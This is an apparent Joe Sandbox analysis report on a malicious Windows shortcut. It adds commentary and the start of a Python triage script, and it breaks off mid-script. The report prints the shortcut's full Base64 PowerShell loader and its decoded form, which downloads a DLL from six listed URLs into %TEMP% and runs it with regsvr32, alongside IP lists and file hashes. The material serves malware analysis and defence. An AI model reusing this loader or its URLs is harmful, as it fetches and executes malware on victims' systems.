216.158.226.206 | unknown | United States | 19318 | IS-AS-1US | true
91.207.28.33 | unknown | Kyrgyzstan | 39819 | PROHOSTKG | true
51.91.7.5 | unknown | France | 16276 | OVHFR | true
5.9.116.246 | unknown | Germany | 24940 | HETZNER-ASDE | true
138.201.142.73 | unknown | Germany | 24940 | HETZNER-ASDE | true
188.44.20.25 | unknown | Macedonia | 57374 | GIV-ASMK | true
45.235.8.30 | unknown | Brazil | 267405 | WIKINETTELECOMUNICACOESBR | true
153.126.146.25 | unknown | Japan | 7684 | SAKURA-ASAKURAInternetIncJP | true
72.15.201.15 | unknown | United States | 13649 | ASN-VINSUS | true
209.250.246.206 | unknown | European Union | 20473 | AS-CHOOPAUS | true
82.165.152.127 | unknown | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
107.182.225.142 | unknown | United States | 32780 | HOSTINGSERVICES-INCUS | true
134.122.66.193 | unknown | United States | 14061 | DIGITALOCEAN-ASNUS | true
131.100.24.231 | unknown | Brazil | 61635 | GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR | true
27.54.89.58 | unknown | Australia
                                                                                                  38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                  46.55.222.11
                                                                                                  unknownBulgaria
                                                                                                  34841BALCHIKNETBGtrue
                                                                                                  173.212.193.249
                                                                                                  unknownGermany
                                                                                                  51167CONTABODEtrue
                                                                                                  103.70.28.102
                                                                                                  unknownViet Nam
                                                                                                  63761MAXDATA-VNCongtyTNHHDichvutructuyenMaxdataVNtrue
                                                                                                  149.56.131.28
                                                                                                  unknownCanada
                                                                                                  16276OVHFRtrue
                                                                                                  176.104.106.96
                                                                                                  unknownSerbia
                                                                                                  198371NINETRStrue
                                                                                                  209.97.163.214
                                                                                                  unknownUnited States
                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                  203.114.109.124
                                                                                                  unknownThailand
                                                                                                  131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                                                                                  1.234.2.232
                                                                                                  unknownKorea Republic of
                                                                                                  9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                  138.197.147.101
                                                                                                  unknownUnited States
                                                                                                  14061DIGITALOCEAN-ASNUStrue
                                                                                                  119.193.124.41
                                                                                                  unknownKorea Republic of
                                                                                                  4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                  129.232.188.93
                                                                                                  unknownSouth Africa
                                                                                                  37153xneeloZAtrue
                                                                                                  94.23.45.86
                                                                                                  unknownFrance
                                                                                                  16276OVHFRtrue
                                                                                                  IP
                                                                                                  127.0.0.1
Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 615497
Start date and time: 2022-04-26 09:45:08 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 18s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 2022-04-26_1045.exe.lnk
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 28
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winLNK@22/18@1/65
EGA Information:
• Successful, ratio: 50%
HDC Information:
• Successful, ratio: 83.2% (good quality ratio 69.2%)
• Quality average: 62.8%
• Quality standard deviation: 36.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 28
• Number of non-executed functions: 111
Cookbook Comments:
• Found application associated with file extension: .lnk
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 23.211.4.86, 173.222.108.226, 173.222.108.210, 20.54.110.249
• Excluded domains from analysis (whitelisted): fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Execution Graph export aborted for target powershell.exe, PID 6424 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6624 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtProtectVirtualMemory calls found
• Report size getting too big: too many NtQueryValueKey calls found
Time | Type | Description
09:46:17 | API Interceptor | 90x Sleep call for process: powershell.exe modified
09:46:49 | API Interceptor | 10x Sleep call for process: svchost.exe modified
09:47:39 | API Interceptor | 1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                  AO_95923068.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  Swift Copy.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 148.66.136.2
                                                                                                                                                                                  AO_95923068.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.38.213
                                                                                                                                                                                  https://s3.amazonaws.com/manageyourparcel14/2.htmlGet hashmaliciousBrowse
                                                                                                                                                                                  • 97.74.94.216
                                                                                                                                                                                  https://joodline.com/ufw/RSByPTulJI.zipGet hashmaliciousBrowse
                                                                                                                                                                                  • 72.167.126.225
                                                                                                                                                                                  SOA.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 107.180.46.149
                                                                                                                                                                                  DB_DHL_AWB_001833022AD.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 198.71.233.167
                                                                                                                                                                                  PO#801644.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 184.168.102.151
                                                                                                                                                                                  fhNQhw4dRqGet hashmaliciousBrowse
                                                                                                                                                                                  • 198.12.169.176
                                                                                                                                                                                  PO-AO XIANG FZCO.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 173.201.181.36
                                                                                                                                                                                  IvEAo3r7kT.exeGet hashmaliciousBrowse
                                                                                                                                                                                  • 166.62.76.161
                                                                                                                                                                                  https://asrar.edu.kw/ufw/hcS/PRq/29R/Pm4CD8N.zipGet hashmaliciousBrowse
                                                                                                                                                                                  • 107.180.21.53
No context
No context
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x3867dcc8, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.250691470186048
Encrypted: false
SSDEEP: 384:E+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:7SB2nSB2RSjlK/+mLesOj1J2
MD5: 864D3C9861B37575EF5982560433A06D
SHA1: 76EE1F8FE65BB5703BB2D988B9B80DCFF76D0728
SHA-256: 338C311D846994BE7F4B2DAA04A036DB612AEF295EE576D0C4AA54DFD66D19C6
SHA-512: 5B6D8884BF581B9C6DD8D12FD0C6AF886470135D056C6690B17B58CF445FCC38BC230EAA74BD9687C1F68BE9A4E21EBB31F19ECC4C949E3EA7889607D4486359
Malicious: false
Process: C:\Windows\System32\regsvr32.exe
File Type: Microsoft Cabinet archive data, 60992 bytes, 1 file
Category: dropped
Size (bytes): 60992
Entropy (8bit): 7.994637486921971
Encrypted: true
SSDEEP: 1536:1ccLOuSwR3W8vM1pjd8MpGwIMESUnWWiidx34:1ccLm6W8vUBCMpGwIMEDnqe4
MD5: 637481DF32351129E60560D5A5C100B5
SHA1: A46AEE6E5A4A4893FBA5806BCC14FC7FB3CE80AE
SHA-256: 1F1029D94CA4656A577D554CEDD79D447658F475AF08620084897A5523587052
SHA-512: 604BFD0A78A57DFDDD45872803501AD89491E37E89E0778B0F13644FA9164FF509955A57469DFDD65A05BBEDAF0ACB669F68430E84800D17EFE7D360A70569E3
Malicious: false
Process: C:\Windows\System32\regsvr32.exe
File Type: data
Category: modified
Size (bytes): 330
Entropy (8bit): 3.162471063763029
Encrypted: false
SSDEEP: 6:kKhE/bN+SkQlPlEGYRMY9z+4KlDA3RUeAxf1:K/UkPlE99SNxAhUekf1
MD5: 5F0E1EC9544C838E2F54915BBBACED0C
SHA1: AE6F181548F49C4E2CC2C8F74184FB304E182FA6
SHA-256: FF8C160C74DB269E9922ED91C844D28997B8D65EBBB9797C344B7AEF952356AB
SHA-512: D0E582F7E8A7CC87DE8017438627C5C2EF2684AF43B54DCB75C02FC69BAFBEE26238360699AEA80C9546289410F94DD844013707F60166ACB9CBCA9D89E337EF
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 11606
Entropy (8bit): 4.884004042663719
Encrypted: false
SSDEEP: 192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4n2Ca6pZlb4:ySib4q4dvEib42opbjvwRjdvRnrkjh4v
MD5: BD615E1A2BC83828E536E020BD2D7DE9
SHA1: 340AF08B8BB60B52442FFE05FF8277C4276C8320
SHA-256: B5285E108F6ED9D942F56E840A5DFCA938E65FBC64A18729DFD96BE71D878416
SHA-512: 90EC9D0E15D0D7609963BC7E19A2DE7B1D8B068460D2A0AA666D94E84360116868D19417F5C8D87E82D917CF6BC8BFFDEA8CDC73A86CD44419FFACA1E261D0E6
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.9260988789684415
Encrypted: false
SSDEEP: 3:Nlllulb/lj:NllUb/l
MD5: 13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1: F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256: 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512: 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious: false
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 473088
Entropy (8bit): 6.839342414681294
Encrypted: false
SSDEEP: 12288:cYI/EvSkO2GGIBaUPPGJc1jExt+9NuI6I78:RI/EoxBaQZExt+9Nu
MD5: 63935105CF001C980B664DB3BEB124FB
SHA1: A44DF97A8AA1EDEA9713A5B9B4BEF3B3BB2ECA6A
SHA-256: 2D583F9460C8224531E69BF226AAA55D983898082B59BC1995CABBB486572CA7
SHA-512: FFAE8AFA0CC192228E65A31D69A2F07CAFFFBCF8D72D79C4581AC43468DB7AB1E4F2289707E3C50D90D9D722337516D624AF264990C141B2D21D67620F2C5205
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with very long lines, with CR line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):898
                                                                                                                                                                                  Entropy (8bit):3.8218645015810377
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:QCYOZohdiOgUjparqvWbzPi/F1uCOE19kLlF6z:QOZpObgHa/HuCOE1YlS
                                                                                                                                                                                  MD5:3F6B9A3C25A96DAC461257368B47EC82
                                                                                                                                                                                  SHA1:D14A5D0FD3F7565796AC3DEC993C68A77793FA6E
                                                                                                                                                                                  SHA-256:E1388ABCFEA4474662917EE606C959651D8D9F54A67B6FD89643D06EC25A0F50
                                                                                                                                                                                  SHA-512:59803AA3398E6CB5370D3E620C2BD0F12B314561BD3A95676EAB8148C447828343B3FB192D58605EB2B1A7959B0C473FAC8062743B7D262795BAEF3868542235
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:..$.P.r.o.g.r.e.s.s.P.r.e.f.e.r.e.n.c.e.=.".S.i.l.e.n.t.l.y.C.o.n.t.i.n.u.e.".;.$.l.i.n.k.s.=.(.".h.t.t.p.:././.f.o.c.u.s.m.e.d.i.c.a...i.n./.f.m.l.i.b./.I.x.B.A.B.M.h.0.I.2.c.L.M.3.q.q.1.G.V.v./.".,.".h.t.t.p.:././.d.e.m.o.3.4...c.k.g...h.k./.s.e.r.v.i.c.e./.h.h.M.Z.r.f.C.7.M.n.m.9.J.D./.".,.".h.t.t.p.:././.c.o.l.e.g.i.o.u.n.a.m.u.n.o...e.s./.c.g.i.-.b.i.n./.E./.".,.".h.t.t.p.:././.c.i.p.r.o...m.x./.p.r.e.n.s.a./.s.i.Z.P.6.9.r.B.F.m.i.b.D.v.u.T.P.1.L./.".,.".h.t.t.p.:././.f.i.l.m.m.o.g.z.i.v.o.t.a...r.s./.S.p.r.y.A.s.s.e.t.s./.g.D.R./.".,.".h.t.t.p.s.:././.c.r.e.e.m.o...p.l./.w.p.-.a.d.m.i.n./.Z.K.S.1.D.c.d.q.u.U.T.4.B.b.8.K.b./.".).;.f.o.r.e.a.c.h. .(.$.u. .i.n. .$.l.i.n.k.s.). .{.t.r.y. .{.I.W.R. .$.u. .-.O.u.t.F.i.l.e. .$.e.n.v.:.T.E.M.P./.G.M.O.W.D.T.R.f.I.J...x.t.q.;.R.e.g.s.v.r.3.2...e.x.e. .$.e.n.v.:.T.E.M.P./.G.M.O.W.D.T.R.f.I.J...x.t.q.;.b.r.e.a.k.}. .c.a.t.c.h. .{. .}.}.....
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4519
                                                                                                                                                                                  Entropy (8bit):3.8167704602295203
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:OBrEF5pQjpLvQInJor8O4SogZoV1onJor8O4SogZoVxH:grEFgFLv9n+hHqWn+hHqx
                                                                                                                                                                                  MD5:0CED9A53B0923DFB36595D89FD519B97
                                                                                                                                                                                  SHA1:8F9E88294C1D2EB741FD28B687AB5B98218CA315
                                                                                                                                                                                  SHA-256:7763B99548C0DDCDC2F70E6019357460E85E3945A62E48E09540CA3DE87525E9
                                                                                                                                                                                  SHA-512:F37950D321569EFE0DEF40D0F01F9320FAB742D68BFDFA1AD7D7A7758B5C4430022D2A87CF0760AD0ECB953D446E0E26A67C1E0A2F8AD52704D47ADC9A3A07ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...................................FL..................F. .. .......3...v.$.Y..":.#.Y..r............................P.O. .:i.....+00.:...:..,.LB.)...A&...&......N....-..@$s..3...;.$.Y....|.2.r....T. .2022-0~1.LNK..`......hT...T.....h......................0.2.0.2.2.-.0.4.-.2.6._.1.0.4.5...e.x.e...l.n.k.......]...............-.......\...........'........C:\Users\user\Desktop\2022-04-26_1045.exe.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......305090...........!a..%.H.VZAj................-..!a..%.H.VZAj................-........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ...........................FL..................F.".. ....#N......#/O9....#N......@...........................P.O. .:i.....+00.../C:\...................V.1.....hT....Windows.@......L...T...........................M...W.i.n.d.o.w.s.....Z.1.....hT...System32..B......L...T...........................(.,.S.y.s.t.e.m.
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1034
                                                                                                                                                                                  Entropy (8bit):5.177821664767542
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:BxSAbxvBn/nx2DOXUWEgqWiHjeTKKjX4CIym1ZJXBNunxSAZy:BZVvhfoOkgtiqDYB1ZzNAZZy
                                                                                                                                                                                  MD5:12F0D6299102693ED963B68B41611A8B
                                                                                                                                                                                  SHA1:FB48D6D17661A9F203E823D142493D2B8D1C51C2
                                                                                                                                                                                  SHA-256:B0D86992BC8C3FF5320593454CD0DFF86E9A0C5A07F9C838E4EAE35F0982A825
                                                                                                                                                                                  SHA-512:95D771F7EA6CE95F82FAF5B6AAE47D19AA71710BB2C95BF316D584ECCC1C4FF62A956974EE0CCFB46A26D51049EAB7408D9FFDF9E21DE0FCC8C8CF4DED8DB786
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426094620..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -file C:\Users\user\AppData\Local\Temp\ezMgZunnfF.ps1..Process ID: 6624..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220426094620..**********************..PS>CommandInvocation(ezMgZunnfF.ps1): "ezMgZunnfF.ps1"..**********************..Command start time: 20220426095140..**********************..PS>$global:?..True..**********************..Windows PowerShell transcript end..End time: 202204
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):3613
                                                                                                                                                                                  Entropy (8bit):5.858450296755712
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:BZrhfNm3JPTcJ+62qDo1Z63JPTcJ+6SygPaIZ0i:kJPTcJhRJPTcJhNgz
                                                                                                                                                                                  MD5:2460B1C0E90B9D289A12F6E4387868C7
                                                                                                                                                                                  SHA1:2334132A2276ACD2B5BFB2205A209FED212219A5
                                                                                                                                                                                  SHA-256:165DDEE0C89E7749E73670EF579DA84896FC18D7ECF641B9019D37EFF3C5300F
                                                                                                                                                                                  SHA-512:71F5001D198E5EEC4810282DD97AC25A223ACB4A28AA30F55F747496049EB87A992327F871E027FA67AB8716706082F60A6C76A1A201592B4557511273F244BD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426094617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command Out-String -InputObject 2022-04-26_1045.lnk | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9
                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):55
                                                                                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:modified
Size (bytes):9062
Entropy (8bit):3.164892090251247
Encrypted:false
SSDEEP:192:cY+38+DJl+ibJ6+ioJJ+i3N+WtT+E9tD+Ett3d+E3zw+w:j+s+v+b+P+m+0+Q+q+n+w
MD5:A18C5385825C988E5CCDF369D7BD5C91
SHA1:D2416A55A4846E0120AED4C1BF9A7E48D1DABB57
SHA-256:8A815FD462F1628AD305028A2937AC3FCBB84E395DB91381ADED5E532A86F406
SHA-512:FF0E70003C70DBB608A21BE5048FF72F4FC409921CFFFD89F963FB7E86BB115EB8A2436B7073E6D9B18FB41AC62660C27A88F74A8CD3D5EAD004EC63869FFBB9
Malicious:false
Preview (UTF-16LE text, decoded):
-----------------------------------------------------------------------------------------
MpCmdRun: Command Line: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
 Start Time: Thu Jun 27 2019 01:29:49

MpEnsureProcessMitigationPolicy: hr = 0x1
WDEnable
ERROR: MpWDEnable(TRUE) failed (800704EC)
MpCmdRun: End Time: Thu Jun 27 2019 01:29:49
-----------------------------------------------------------------------------------------

-----------------------------------------------

Process:C:\Windows\System32\regsvr32.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):473088
Entropy (8bit):6.839342414681294
Encrypted:false
SSDEEP:12288:cYI/EvSkO2GGIBaUPPGJc1jExt+9NuI6I78:RI/EoxBaQZExt+9Nu
MD5:63935105CF001C980B664DB3BEB124FB
SHA1:A44DF97A8AA1EDEA9713A5B9B4BEF3B3BB2ECA6A
SHA-256:2D583F9460C8224531E69BF226AAA55D983898082B59BC1995CABBB486572CA7
SHA-512:FFAE8AFA0CC192228E65A31D69A2F07CAFFFBCF8D72D79C4581AC43468DB7AB1E4F2289707E3C50D90D9D722337516D624AF264990C141B2D21D67620F2C5205
Malicious:false
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........M.u.,.&.,.&.,.&...&.,.&...&.,.&.,.&...&.~.&D,.&.~.&.,.&.~.&K,.&.~.&.,.&.~.&.,.&.~.&.,.&Rich.,.&........................PE..d...2.gb.........." .........:..........................................................................................................O...............L........3..........................................................................x...@....................text...|........................... ..`.rdata..............................@..@.data............,..................@....pdata...3.......4...*..............@..@.rsrc...L............^..............@..@.reloc..j).......*..................@..B........................................................................................................................................................................................................................................................

File type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, Has command line arguments, Icon number=134, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
Entropy (8bit):3.8003701847521434
TrID:
• Windows Shortcut (20020/1) 100.00%
File name:2022-04-26_1045.exe.lnk
File size:2930
MD5:a4e45d28631ea2dd178f314f1362f213
SHA1:ae71fe52df0fa3762866eeb6fb4829cc7c6877ce
SHA256:0110ac3095c40757e96ec0d66c639cdbdb7c1247eed0ed79281820423f164992
SHA512:385d09d557b4bb28c03ef647af368fc9107612e89540ba59abdbc69e3a23e7f02cd0f2b8e95203b32f0a8c50e84e741c9a87e68f9209bccd4e73b655ccf2ed04
SSDEEP:48:8n5awp7dXjrxFZTWsaHDFKLUcIhAOnPO3Crc9fBj4ab:8n5xdjnS/OyrEfBj4
TLSH:5A518C282AEA1218FAF3DF3168E53545DD67BC92A9319A8E008D474A1723640ED95F3E
File Content Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
Icon Hash:fc3cf4c4dcd9d9ed

General

Relative Path:
Command Line Argument:-command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIsImh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwiaHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJodHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwiaHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwiaHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1QL0dNT1dEVFJmSUoueHRxO1JlZ3N2cjMyLmV4ZSAkZW52OlRFTVAvR01PV0RUUmZJSi54dHE7YnJlYWt9IGNhdGNoIHsgfX0=')) > "%tmp%\ezMgZunnfF.ps1" ; powershell -executionpolicy bypass -file "%tmp%\ezMgZunnfF.ps1"; Remove-Item "%tmp%\ezMgZunnfF.ps1"
Icon location:shell32.dll
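The argument string above is the whole first stage of the infection chain: PowerShell decodes a Base64 literal with [System.Text.Encoding]::ASCII, writes the result to a .ps1 in %tmp%, runs it with -executionpolicy bypass and then deletes it. Decoding the literal shows the second stage: it sets $ProgressPreference to SilentlyContinue, walks a list of six download URLs, saves the first response that succeeds as $env:TEMP/GMOWDTRfIJ.xtq, hands that file to Regsvr32.exe and stops. The .xtq extension is irrelevant to regsvr32, which loads the file with LoadLibrary and calls its DllRegisterServer export regardless of name, which is why the dropped file under the regsvr32.exe process above is a PE32+ DLL. The Python script below is an added triage example, not Joe Sandbox code: it performs exactly that decode on the argument string copied from the field above and extracts the URLs, the drop path, the loader and the behaviours a responder would want flagged. The Triage structure and the wording of the indicators are mine, not something the report defines.

```python
"""Triage the LNK argument string from the "General" block above.

Added example (not Joe Sandbox code): it finds the FromBase64String literal,
decodes it as ASCII exactly as the shortcut does, and extracts the download
URLs, the temp-file name handed to regsvr32 and the loader behaviours a
responder would flag. The Triage fields and indicator wording are my own.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass, field

# Copied verbatim from the "Command Line Argument" field of the report.
LNK_ARGS = (
    r'-command Out-String -InputObject "2022-04-26_1045.lnk " | Out-Null; '
    r"[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('"
    "JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDov"
    "L2ZvY3VzbWVkaWNhLmluL2ZtbGliL0l4QkFCTWgwSTJjTE0zcXExR1Z2LyIs"
    "Imh0dHA6Ly9kZW1vMzQuY2tnLmhrL3NlcnZpY2UvaGhNWnJmQzdNbm05SkQvIiwi"
    "aHR0cDovL2NvbGVnaW91bmFtdW5vLmVzL2NnaS1iaW4vRS8iLCJo"
    "dHRwOi8vY2lwcm8ubXgvcHJlbnNhL3NpWlA2OXJCRm1pYkR2dVRQMUwvIiwi"
    "aHR0cDovL2ZpbG1tb2d6aXZvdGEucnMvU3ByeUFzc2V0cy9nRFIvIiwi"
    "aHR0cHM6Ly9jcmVlbW8ucGwvd3AtYWRtaW4vWktTMURjZHF1VVQ0QmI4S2IvIik7"
    "Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGVudjpURU1Q"
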